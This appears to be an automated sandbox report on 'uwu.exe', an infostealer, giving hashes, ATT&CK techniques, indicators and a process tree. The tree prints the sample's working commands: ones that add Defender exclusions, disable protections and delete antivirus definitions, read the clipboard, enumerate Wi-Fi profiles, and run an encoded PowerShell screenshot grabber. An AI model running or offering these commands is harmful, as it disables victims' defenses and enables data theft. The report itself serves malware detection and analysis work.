d5663b07b8bb969d6400191c86c4f10133c082d29141d8e9b1895757c1dd1fb2

Analysis

max time kernel
190s
max time network
298s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
19-10-2024 20:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

uwu.exe
Size

8.7MB
MD5

d95a659d9b625e10072d206cb32b9014
SHA1

d7ec21d30ca7d3ad623431132d4249ab5039599a
SHA256

d5663b07b8bb969d6400191c86c4f10133c082d29141d8e9b1895757c1dd1fb2
SHA512

683b8a7affaffb9900f8bf9d55fe1549aea4ad2662b687a6a1b0992a65775aab53753a9a2a61c8f19ab2d883c4e38f2fd6b67910936b9f46348fbf43a0314d39
SSDEEP

196608:mz8PZY8Mq4dusK8B6Ljv+bhqNVoB0SEsucQZ41JBbIEs1L3:g8PZY8t4ksK0OL+9qz80SJHQK1J9sh3

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
4060	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2868	powershell.exe
1664	powershell.exe
4560	powershell.exe
3204	powershell.exe
632	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2024	cmd.exe
2840	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4876	bound.exe
3648	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe
4308	uwu.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	discord.com
10	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1052	tasklist.exe
4284	tasklist.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001ab79-22.dat	upx
behavioral1/memory/4308-26-0x00007FF863310000-0x00007FF8638FE000-memory.dmp	upx
behavioral1/files/0x000700000001ab6b-28.dat	upx
behavioral1/memory/4308-31-0x00007FF876630000-0x00007FF876654000-memory.dmp	upx
behavioral1/files/0x000700000001ab77-30.dat	upx
behavioral1/memory/4308-33-0x00007FF8763B0000-0x00007FF8763BF000-memory.dmp	upx
behavioral1/files/0x000700000001ab76-36.dat	upx
behavioral1/files/0x000700000001ab78-37.dat	upx
behavioral1/files/0x000700000001ab7c-40.dat	upx
behavioral1/files/0x000700000001ab72-50.dat	upx
behavioral1/files/0x000700000001ab71-49.dat	upx
behavioral1/files/0x000700000001ab70-48.dat	upx
behavioral1/files/0x000700000001ab6f-47.dat	upx
behavioral1/files/0x000700000001ab6e-46.dat	upx
behavioral1/files/0x000700000001ab6d-45.dat	upx
behavioral1/files/0x000700000001ab6c-44.dat	upx
behavioral1/files/0x000800000001ab6a-43.dat	upx
behavioral1/files/0x000700000001ab7e-42.dat	upx
behavioral1/files/0x000700000001ab7d-41.dat	upx
behavioral1/memory/4308-56-0x00007FF876380000-0x00007FF8763AD000-memory.dmp	upx
behavioral1/memory/4308-58-0x00007FF876360000-0x00007FF876379000-memory.dmp	upx
behavioral1/memory/4308-60-0x00007FF876330000-0x00007FF876353000-memory.dmp	upx
behavioral1/memory/4308-62-0x00007FF8725B0000-0x00007FF872726000-memory.dmp	upx
behavioral1/memory/4308-64-0x00007FF876310000-0x00007FF876329000-memory.dmp	upx
behavioral1/memory/4308-66-0x00007FF876300000-0x00007FF87630D000-memory.dmp	upx
behavioral1/memory/4308-68-0x00007FF863310000-0x00007FF8638FE000-memory.dmp	upx
behavioral1/memory/4308-69-0x00007FF872C10000-0x00007FF872C43000-memory.dmp	upx
behavioral1/memory/4308-71-0x00007FF876630000-0x00007FF876654000-memory.dmp	upx
behavioral1/memory/4308-72-0x00007FF872A70000-0x00007FF872B3D000-memory.dmp	upx
behavioral1/memory/4308-75-0x00007FF862DE0000-0x00007FF863302000-memory.dmp	upx
behavioral1/memory/4308-79-0x00007FF872BF0000-0x00007FF872C04000-memory.dmp	upx
behavioral1/memory/4308-78-0x00007FF876380000-0x00007FF8763AD000-memory.dmp	upx
behavioral1/memory/4308-81-0x00007FF876330000-0x00007FF876353000-memory.dmp	upx
behavioral1/memory/4308-82-0x00007FF8762F0000-0x00007FF8762FD000-memory.dmp	upx
behavioral1/memory/4308-86-0x00007FF872490000-0x00007FF8725AC000-memory.dmp	upx
behavioral1/memory/4308-85-0x00007FF8725B0000-0x00007FF872726000-memory.dmp	upx
behavioral1/memory/4308-99-0x00007FF876310000-0x00007FF876329000-memory.dmp	upx
behavioral1/memory/4308-225-0x00007FF872C10000-0x00007FF872C43000-memory.dmp	upx
behavioral1/memory/4308-305-0x00007FF872A70000-0x00007FF872B3D000-memory.dmp	upx
behavioral1/memory/4308-376-0x00007FF872490000-0x00007FF8725AC000-memory.dmp	upx
behavioral1/memory/4308-373-0x00007FF862DE0000-0x00007FF863302000-memory.dmp	upx
behavioral1/memory/4308-374-0x00007FF872BF0000-0x00007FF872C04000-memory.dmp	upx
behavioral1/memory/4308-362-0x00007FF863310000-0x00007FF8638FE000-memory.dmp	upx
behavioral1/memory/4308-363-0x00007FF876630000-0x00007FF876654000-memory.dmp	upx
behavioral1/memory/4308-508-0x00007FF876630000-0x00007FF876654000-memory.dmp	upx
behavioral1/memory/4308-513-0x00007FF8725B0000-0x00007FF872726000-memory.dmp	upx
behavioral1/memory/4308-507-0x00007FF863310000-0x00007FF8638FE000-memory.dmp	upx
behavioral1/memory/4308-545-0x00007FF863310000-0x00007FF8638FE000-memory.dmp	upx
behavioral1/memory/4308-559-0x00007FF872490000-0x00007FF8725AC000-memory.dmp	upx
behavioral1/memory/4308-556-0x00007FF862DE0000-0x00007FF863302000-memory.dmp	upx
behavioral1/memory/4308-555-0x00007FF872A70000-0x00007FF872B3D000-memory.dmp	upx
behavioral1/memory/4308-554-0x00007FF872C10000-0x00007FF872C43000-memory.dmp	upx
behavioral1/memory/4308-553-0x00007FF876300000-0x00007FF87630D000-memory.dmp	upx
behavioral1/memory/4308-552-0x00007FF876310000-0x00007FF876329000-memory.dmp	upx
behavioral1/memory/4308-550-0x00007FF876330000-0x00007FF876353000-memory.dmp	upx
behavioral1/memory/4308-548-0x00007FF876380000-0x00007FF8763AD000-memory.dmp	upx
behavioral1/memory/4308-547-0x00007FF8763B0000-0x00007FF8763BF000-memory.dmp	upx
behavioral1/memory/4308-546-0x00007FF876630000-0x00007FF876654000-memory.dmp	upx
behavioral1/memory/4308-558-0x00007FF8762F0000-0x00007FF8762FD000-memory.dmp	upx
behavioral1/memory/4308-557-0x00007FF872BF0000-0x00007FF872C04000-memory.dmp	upx
behavioral1/memory/4308-551-0x00007FF8725B0000-0x00007FF872726000-memory.dmp	upx
behavioral1/memory/4308-549-0x00007FF876360000-0x00007FF876379000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4436	cmd.exe
3264	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
560	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
736	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
3204	powershell.exe
2868	powershell.exe
3204	powershell.exe
2868	powershell.exe
2868	powershell.exe
3204	powershell.exe
3204	powershell.exe
632	powershell.exe
632	powershell.exe
2840	powershell.exe
2840	powershell.exe
2868	powershell.exe
2868	powershell.exe
2840	powershell.exe
632	powershell.exe
4320	powershell.exe
4320	powershell.exe
2840	powershell.exe
632	powershell.exe
4320	powershell.exe
4320	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
548	powershell.exe
548	powershell.exe
548	powershell.exe
4560	powershell.exe
4560	powershell.exe
4560	powershell.exe
2272	powershell.exe
2272	powershell.exe
2272	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	1052	tasklist.exe
Token: SeDebugPrivilege	632	powershell.exe
Token: SeIncreaseQuotaPrivilege	4744	WMIC.exe
Token: SeSecurityPrivilege	4744	WMIC.exe
Token: SeTakeOwnershipPrivilege	4744	WMIC.exe
Token: SeLoadDriverPrivilege	4744	WMIC.exe
Token: SeSystemProfilePrivilege	4744	WMIC.exe
Token: SeSystemtimePrivilege	4744	WMIC.exe
Token: SeProfSingleProcessPrivilege	4744	WMIC.exe
Token: SeIncBasePriorityPrivilege	4744	WMIC.exe
Token: SeCreatePagefilePrivilege	4744	WMIC.exe
Token: SeBackupPrivilege	4744	WMIC.exe
Token: SeRestorePrivilege	4744	WMIC.exe
Token: SeShutdownPrivilege	4744	WMIC.exe
Token: SeDebugPrivilege	4744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4744	WMIC.exe
Token: SeRemoteShutdownPrivilege	4744	WMIC.exe
Token: SeUndockPrivilege	4744	WMIC.exe
Token: SeManageVolumePrivilege	4744	WMIC.exe
Token: 33	4744	WMIC.exe
Token: 34	4744	WMIC.exe
Token: 35	4744	WMIC.exe
Token: 36	4744	WMIC.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	4284	tasklist.exe
Token: SeDebugPrivilege	4320	powershell.exe
Token: SeIncreaseQuotaPrivilege	3204	powershell.exe
Token: SeSecurityPrivilege	3204	powershell.exe
Token: SeTakeOwnershipPrivilege	3204	powershell.exe
Token: SeLoadDriverPrivilege	3204	powershell.exe
Token: SeSystemProfilePrivilege	3204	powershell.exe
Token: SeSystemtimePrivilege	3204	powershell.exe
Token: SeProfSingleProcessPrivilege	3204	powershell.exe
Token: SeIncBasePriorityPrivilege	3204	powershell.exe
Token: SeCreatePagefilePrivilege	3204	powershell.exe
Token: SeBackupPrivilege	3204	powershell.exe
Token: SeRestorePrivilege	3204	powershell.exe
Token: SeShutdownPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeSystemEnvironmentPrivilege	3204	powershell.exe
Token: SeRemoteShutdownPrivilege	3204	powershell.exe
Token: SeUndockPrivilege	3204	powershell.exe
Token: SeManageVolumePrivilege	3204	powershell.exe
Token: 33	3204	powershell.exe
Token: 34	3204	powershell.exe
Token: 35	3204	powershell.exe
Token: 36	3204	powershell.exe
Token: SeIncreaseQuotaPrivilege	4744	WMIC.exe
Token: SeSecurityPrivilege	4744	WMIC.exe
Token: SeTakeOwnershipPrivilege	4744	WMIC.exe
Token: SeLoadDriverPrivilege	4744	WMIC.exe
Token: SeSystemProfilePrivilege	4744	WMIC.exe
Token: SeSystemtimePrivilege	4744	WMIC.exe
Token: SeProfSingleProcessPrivilege	4744	WMIC.exe
Token: SeIncBasePriorityPrivilege	4744	WMIC.exe
Token: SeCreatePagefilePrivilege	4744	WMIC.exe
Token: SeBackupPrivilege	4744	WMIC.exe
Token: SeRestorePrivilege	4744	WMIC.exe
Token: SeShutdownPrivilege	4744	WMIC.exe
Token: SeDebugPrivilege	4744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4744	WMIC.exe
Token: SeRemoteShutdownPrivilege	4744	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 336 wrote to memory of 4308	336	uwu.exe	71
PID 336 wrote to memory of 4308	336	uwu.exe	71
PID 4308 wrote to memory of 208	4308	uwu.exe	72
PID 4308 wrote to memory of 208	4308	uwu.exe	72
PID 4308 wrote to memory of 4304	4308	uwu.exe	73
PID 4308 wrote to memory of 4304	4308	uwu.exe	73
PID 4308 wrote to memory of 1380	4308	uwu.exe	76
PID 4308 wrote to memory of 1380	4308	uwu.exe	76
PID 4308 wrote to memory of 628	4308	uwu.exe	77
PID 4308 wrote to memory of 628	4308	uwu.exe	77
PID 4308 wrote to memory of 4672	4308	uwu.exe	78
PID 4308 wrote to memory of 4672	4308	uwu.exe	78
PID 4304 wrote to memory of 2868	4304	cmd.exe	83
PID 4304 wrote to memory of 2868	4304	cmd.exe	83
PID 208 wrote to memory of 3204	208	cmd.exe	82
PID 208 wrote to memory of 3204	208	cmd.exe	82
PID 628 wrote to memory of 4876	628	cmd.exe	84
PID 628 wrote to memory of 4876	628	cmd.exe	84
PID 4308 wrote to memory of 464	4308	uwu.exe	85
PID 4308 wrote to memory of 464	4308	uwu.exe	85
PID 4308 wrote to memory of 3172	4308	uwu.exe	87
PID 4308 wrote to memory of 3172	4308	uwu.exe	87
PID 4308 wrote to memory of 2024	4308	uwu.exe	88
PID 4308 wrote to memory of 2024	4308	uwu.exe	88
PID 464 wrote to memory of 1052	464	cmd.exe	91
PID 464 wrote to memory of 1052	464	cmd.exe	91
PID 1380 wrote to memory of 632	1380	cmd.exe	92
PID 1380 wrote to memory of 632	1380	cmd.exe	92
PID 4672 wrote to memory of 1680	4672	cmd.exe	93
PID 4672 wrote to memory of 1680	4672	cmd.exe	93
PID 4308 wrote to memory of 4816	4308	uwu.exe	94
PID 4308 wrote to memory of 4816	4308	uwu.exe	94
PID 4308 wrote to memory of 1072	4308	uwu.exe	95
PID 4308 wrote to memory of 1072	4308	uwu.exe	95
PID 4308 wrote to memory of 4436	4308	uwu.exe	96
PID 4308 wrote to memory of 4436	4308	uwu.exe	96
PID 4308 wrote to memory of 4328	4308	uwu.exe	99
PID 4308 wrote to memory of 4328	4308	uwu.exe	99
PID 4308 wrote to memory of 2144	4308	uwu.exe	101
PID 4308 wrote to memory of 2144	4308	uwu.exe	101
PID 2024 wrote to memory of 2840	2024	cmd.exe	103
PID 2024 wrote to memory of 2840	2024	cmd.exe	103
PID 3172 wrote to memory of 4744	3172	cmd.exe	104
PID 3172 wrote to memory of 4744	3172	cmd.exe	104
PID 1072 wrote to memory of 4284	1072	cmd.exe	107
PID 1072 wrote to memory of 4284	1072	cmd.exe	107
PID 4816 wrote to memory of 2736	4816	cmd.exe	108
PID 4816 wrote to memory of 2736	4816	cmd.exe	108
PID 4436 wrote to memory of 3264	4436	cmd.exe	109
PID 4436 wrote to memory of 3264	4436	cmd.exe	109
PID 4328 wrote to memory of 736	4328	cmd.exe	110
PID 4328 wrote to memory of 736	4328	cmd.exe	110
PID 2144 wrote to memory of 4320	2144	cmd.exe	111
PID 2144 wrote to memory of 4320	2144	cmd.exe	111
PID 4308 wrote to memory of 3732	4308	uwu.exe	112
PID 4308 wrote to memory of 3732	4308	uwu.exe	112
PID 3732 wrote to memory of 4544	3732	cmd.exe	114
PID 3732 wrote to memory of 4544	3732	cmd.exe	114
PID 4308 wrote to memory of 1480	4308	uwu.exe	115
PID 4308 wrote to memory of 1480	4308	uwu.exe	115
PID 1480 wrote to memory of 3568	1480	cmd.exe	117
PID 1480 wrote to memory of 3568	1480	cmd.exe	117
PID 4308 wrote to memory of 4428	4308	uwu.exe	118
PID 4308 wrote to memory of 4428	4308	uwu.exe	118

C:\Users\Admin\AppData\Local\Temp\uwu.exe
"C:\Users\Admin\AppData\Local\Temp\uwu.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:336
- C:\Users\Admin\AppData\Local\Temp\uwu.exe
  "C:\Users\Admin\AppData\Local\Temp\uwu.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\uwu.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\uwu.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4304
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2868
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('INJECTED!', 0, 'injecting...', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('INJECTED!', 0, 'injecting...', 48+16);close()"
      4⤵
      PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3172
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4328
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
